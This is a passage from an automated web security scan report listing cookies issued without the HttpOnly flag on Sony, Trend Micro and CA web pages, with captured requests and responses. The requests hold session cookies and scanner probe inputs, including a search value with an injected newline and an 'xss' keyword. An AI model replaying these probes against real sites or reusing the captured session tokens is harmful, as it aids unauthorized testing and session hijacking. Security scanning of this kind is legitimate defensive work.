GET /selfservice/common/viewdocument_forFrameset_Metadata.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=E863918E75FCBD614E29DB14317D33BC; Path=/selfservice /kanisa.css" type="text/css" rel="stylesheet">...[SNIP]...
7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/getUMBrowseImageById.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=237B9DF2794C1A2815026B92F3AA0455; Path=/selfservice
Request
GET /selfservice/getUMBrowseImageById.do?objectId=DT_MANUAL_1_1&imageType=0 HTTP/1.1/*;q=0.5;q=0.7/selfservice/microsites/searchEntry.doF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: JSESSIONID=237B9DF2794C1A2815026B92F3AA0455; Path=/selfservice /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1-8859-1
7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/ HTTP/1.1/*;q=0.5;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135
Response
HTTP/1.1 403 ForbiddenSet-Cookie: TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/ torefrontAssetS...[SNIP]...
7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg HTTP/1.1/*;q=0.5;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135
Response
HTTP/1.1 200 OKSet-Cookie: TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/ .Ducky.......d......Adobe.d.................................................................................................................................................1.K.....[SNIP]...
7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg HTTP/1.1/*;q=0.5;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135
Response
HTTP/1.1 200 OKSet-Cookie: TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/ .Ducky.......d......Adobe.d.................................................................................................................................................1.K.....[SNIP]...
7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYErrorRedirect
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/
Request
GET /webapp/wcs/stores/servlet/SYErrorRedirect?URL=StoreCatalogDisplay&storeId=10151&langId=-1&catalogId=10551&eid=437018621 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=session#1315352920400-736912#1315354842|PC#1315334914578-928682.19#1316562582|check#true#1315353042; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167; ensUID=249118483jocCbfxsy2s; s_cc=true; s_visit=1; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 302 Moved Temporarily/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621Set-Cookie: TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/
7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYSearchAjax
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Request
GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OKSet-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/ %3B%20CX%20Series%20Speakers",StorefrontAssetStore/img/75x49/XSV680C...[SNIP]...
7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=xss&x=0&y=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OKSet-Cookie: TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/ /html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]...
7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/
Request
GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1;q=0.7.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6
Response
HTTP/1.1 200 OK.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0)Set-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/ :document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:},I:function(){var s=this.L.search;var c=this.D.cooki...[SNIP]...
7.15. https://www.ca.com/siteminderagent/forms/login.fcc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/siteminderagent/forms/login.fcc
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
Request
POST /siteminderagent/forms/login.fcc HTTP/1.1/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192_EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly...[SNIP]...
Response
